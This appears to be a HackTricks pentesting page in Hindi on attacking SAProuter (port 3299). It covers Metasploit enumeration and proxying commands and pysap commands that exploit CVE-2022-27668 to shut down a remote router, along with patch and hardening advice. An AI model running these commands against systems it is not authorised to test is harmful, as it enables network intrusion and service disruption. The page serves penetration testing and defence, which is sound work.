# # 3299/tcp - Pentesting SAProuter {{#include ../banners/hacktricks-training.md}} ```text PORT STATE SERVICE VERSION 3299/tcp open saprouter? ``` यह [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/) से पोस्ट का सारांश है। ## Metasploit के साथ SAProuter पैठ की समझ SAProuter SAP सिस्टम के लिए एक रिवर्स प्रॉक्सी के रूप में कार्य करता है, मुख्य रूप से इंटरनेट और आंतरिक SAP नेटवर्क के बीच पहुंच को नियंत्रित करने के लिए। इसे आमतौर पर संगठनात्मक फ़ायरवॉल के माध्यम से TCP पोर्ट 3299 को अनुमति देकर इंटरनेट पर उजागर किया जाता है। यह सेटअप SAProuter को पैठ परीक्षण के लिए एक आकर्षक लक्ष्य बनाता है क्योंकि यह उच्च-मूल्य वाले आंतरिक नेटवर्क के लिए एक गेटवे के रूप में कार्य कर सकता है। **स्कैनिंग और जानकारी एकत्र करना** शुरुआत में, यह पहचानने के लिए एक स्कैन किया जाता है कि क्या दिए गए IP पर SAP राउटर चल रहा है, **sap_service_discovery** मॉड्यूल का उपयोग करके। यह कदम SAP राउटर की उपस्थिति और इसके खुले पोर्ट की स्थापना के लिए महत्वपूर्ण है। ```text msf> use auxiliary/scanner/sap/sap_service_discovery msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101 msf auxiliary(sap_service_discovery) > run ``` खोज के बाद, **sap_router_info_request** मॉड्यूल के साथ SAP राउटर की कॉन्फ़िगरेशन में आगे की जांच की जाती है ताकि आंतरिक नेटवर्क विवरण को संभावित रूप से उजागर किया जा सके। ```text msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101 msf auxiliary(sap_router_info_request) > run ``` **आंतरिक सेवाओं की गणना** प्राप्त आंतरिक नेटवर्क अंतर्दृष्टियों के साथ, **sap_router_portscanner** मॉड्यूल का उपयोग आंतरिक होस्ट और सेवाओं की जांच करने के लिए SAProuter के माध्यम से किया जाता है, जिससे आंतरिक नेटवर्क और सेवा कॉन्फ़िगरेशन की गहरी समझ प्राप्त होती है। ```text msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50 msf auxiliary(sap_router_portscanner) > set PORTS 32NN ``` इस मॉड्यूल की विशिष्ट SAP उदाहरणों और पोर्ट्स को लक्षित करने में लचीलापन इसे विस्तृत आंतरिक नेटवर्क अन्वेषण के लिए एक प्रभावी उपकरण बनाता है। **उन्नत एन्यूमरेशन और ACL मैपिंग** अधिक स्कैनिंग यह प्रकट कर सकती है कि SAProuter पर एक्सेस कंट्रोल सूचियाँ (ACLs) कैसे कॉन्फ़िगर की गई हैं, यह विवरण देते हुए कि कौन सी कनेक्शन अनुमत या अवरुद्ध हैं। यह जानकारी सुरक्षा नीतियों और संभावित कमजोरियों को समझने में महत्वपूर्ण है। ```text msf auxiliary(sap_router_portscanner) > set MODE TCP msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN ``` **आंतरिक होस्ट की ब्लाइंड एन्यूमरेशन** उन परिदृश्यों में जहां SAProuter से सीधे जानकारी सीमित है, ब्लाइंड एन्यूमरेशन जैसी तकनीकों का उपयोग किया जा सकता है। यह दृष्टिकोण आंतरिक होस्टनामों के अस्तित्व का अनुमान लगाने और सत्यापित करने का प्रयास करता है, संभावित लक्ष्यों को सीधे IP पते के बिना प्रकट करता है। **पेनिट्रेशन टेस्टिंग के लिए जानकारी का लाभ उठाना** नेटवर्क का मानचित्रण करने और सुलभ सेवाओं की पहचान करने के बाद, पेनिट्रेशन टेस्टर्स Metasploit की प्रॉक्सी क्षमताओं का उपयोग SAProuter के माध्यम से आगे की खोज और आंतरिक SAP सेवाओं के शोषण के लिए कर सकते हैं। ```text msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 msf auxiliary(sap_hostctrl_getcomputersystem) > run ``` **निष्कर्ष** यह दृष्टिकोण सुरक्षित SAProuter कॉन्फ़िगरेशन के महत्व को रेखांकित करता है और लक्षित पेनटेस्टिंग के माध्यम से आंतरिक नेटवर्क तक पहुँचने की संभावनाओं को उजागर करता है। SAP राउटर को सही तरीके से सुरक्षित करना और नेटवर्क सुरक्षा आर्किटेक्चर में उनकी भूमिका को समझना अनधिकृत पहुँच के खिलाफ सुरक्षा के लिए महत्वपूर्ण है। Metasploit मॉड्यूल और उनके उपयोग के बारे में अधिक विस्तृत जानकारी के लिए, [Rapid7's database](http://www.rapid7.com/db) पर जाएं। --- ## हाल की कमजोरियाँ (2022-2025) ### CVE-2022-27668 – अनुचित पहुँच नियंत्रण ➜ दूरस्थ प्रशासनिक कमांड निष्पादन जून 2022 में SAP ने सुरक्षा नोट **3158375** जारी किया, जो SAProuter (सभी कर्नेल ≥ 7.22) में एक महत्वपूर्ण दोष (CVSS 9.8) को संबोधित करता है। एक अनधिकृत हमलावर अनुमति देने वाले `saprouttab` प्रविष्टियों का दुरुपयोग करके **प्रशासनिक पैकेट** (जैसे *shutdown*, *trace-level*, *connection-kill*) को दूरस्थ होस्ट से भेज सकता है, भले ही राउटर को `-X` दूरस्थ-प्रशासन विकल्प के बिना शुरू किया गया हो। यह समस्या इस संभावना के कारण उत्पन्न होती है कि राउटर के अपने लूपबैक इंटरफेस के लिए एक सुरंग बनाई जा सकती है, जो निर्दिष्ट पते **0.0.0.0** को लक्षित करती है। एक बार सुरंग स्थापित हो जाने पर, हमलावर स्थानीय-होस्ट विशेषाधिकार प्राप्त कर लेता है और कोई भी प्रशासनिक कमांड चला सकता है। व्यावहारिक शोषण को **pysap** ढांचे के साथ पुन: उत्पन्न किया जा सकता है: ```bash # 1. Build a loopback tunnel through the vulnerable SAProuter python router_portfw.py -d -p 3299 \ -t 0.0.0.0 -r 3299 \ -a 127.0.0.1 -l 3299 -v # 2. Send an admin packet (here: stop the remote router) python router_admin.py -s -d 127.0.0.1 -p 3299 ``` **प्रभावित संस्करण** * स्टैंड-अलोन SAProuter 7.22 / 7.53 * कर्नेल 7.49, 7.77, 7.81, 7.85–7.88 (शामिल KRNL64NUC/UC) **फिक्स / शमन** 1. SAP नोट **3158375** के साथ प्रदान किए गए पैच को लागू करें। 2. `saprouttab` में `P` और `S` लाइनों से वाइल्डकार्ड (`*`) लक्ष्यों को हटा दें। 3. सुनिश्चित करें कि राउटर **बिना** `-X` विकल्प के शुरू किया गया है और **प्रत्यक्ष** रूप से इंटरनेट के लिए उजागर नहीं है। --- ## अपडेटेड टूलिंग & ट्रिक्स * **pysap** – सक्रिय रूप से बनाए रखा जाता है और कस्टम NI/Router पैकेट बनाने, ACLs को फज़ करने या CVE-2022-27668 शोषण को स्वचालित करने के लिए `router_portfw.py`, `router_admin.py` & `router_trace.py` प्रदान करता है। * **Nmap** – कस्टम SAProuter प्रॉब जोड़कर सेवा पहचान का विस्तार करें: ```text Probe TCP SAProuter q|\x00\x00\x00\x00| ports 3299 match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/ ``` NSE स्क्रिप्टों के साथ या `--script=banner` के साथ मिलाकर बैनर स्ट्रिंग (`SAProuter on ''`) लीक करने वाले संस्करणों की तेजी से पहचान करें। * **Metasploit** – ऊपर दिखाए गए सहायक मॉड्यूल pysap के साथ बनाए गए SOCKS या NI प्रॉक्सी के माध्यम से अभी भी काम करते हैं, जिससे पूर्ण फ्रेमवर्क एकीकरण सक्षम होता है जब राउटर प्रत्यक्ष पहुंच को ब्लॉक करता है। --- ## हार्डनिंग & डिटेक्शन चेकलिस्ट * परिधीय फ़ायरवॉल पर पोर्ट **3299/TCP** को फ़िल्टर करें – केवल विश्वसनीय SAP समर्थन नेटवर्क से ट्रैफ़िक की अनुमति दें। * SAProuter को **पूर्ण रूप से पैच** रखें; `saprouter -v` के साथ सत्यापित करें और नवीनतम कर्नेल पैच स्तर की तुलना करें। * `saprouttab` में **कठोर, होस्ट-विशिष्ट** प्रविष्टियों का उपयोग करें; `*` वाइल्डकार्ड से बचें और मनमाने होस्ट या पोर्ट को लक्षित करने वाले `P`/`S` नियमों को अस्वीकार करें। * सेवा को **`-S ` + SNC** के साथ शुरू करें ताकि एन्क्रिप्शन और आपसी प्रमाणीकरण को लागू किया जा सके। * दूरस्थ प्रशासन (`-X`) को अक्षम करें और, यदि संभव हो, तो आवश्यक ट्रैफ़िक के लिए बाहरी रिवर्स प्रॉक्सी का उपयोग करते हुए श्रोता को `127.0.0.1` पर बाइंड करें। * संदिग्ध `ROUTER_ADM` पैकेट या `0.0.0.0` के लिए अप्रत्याशित `NI_ROUTE` अनुरोधों के लिए **dev_rout** लॉग की निगरानी करें। --- ## **संदर्भ** - [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) - [https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/](https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/) ## Shodan - `port:3299 !HTTP Network packet too big` {{#include ../banners/hacktricks-training.md}}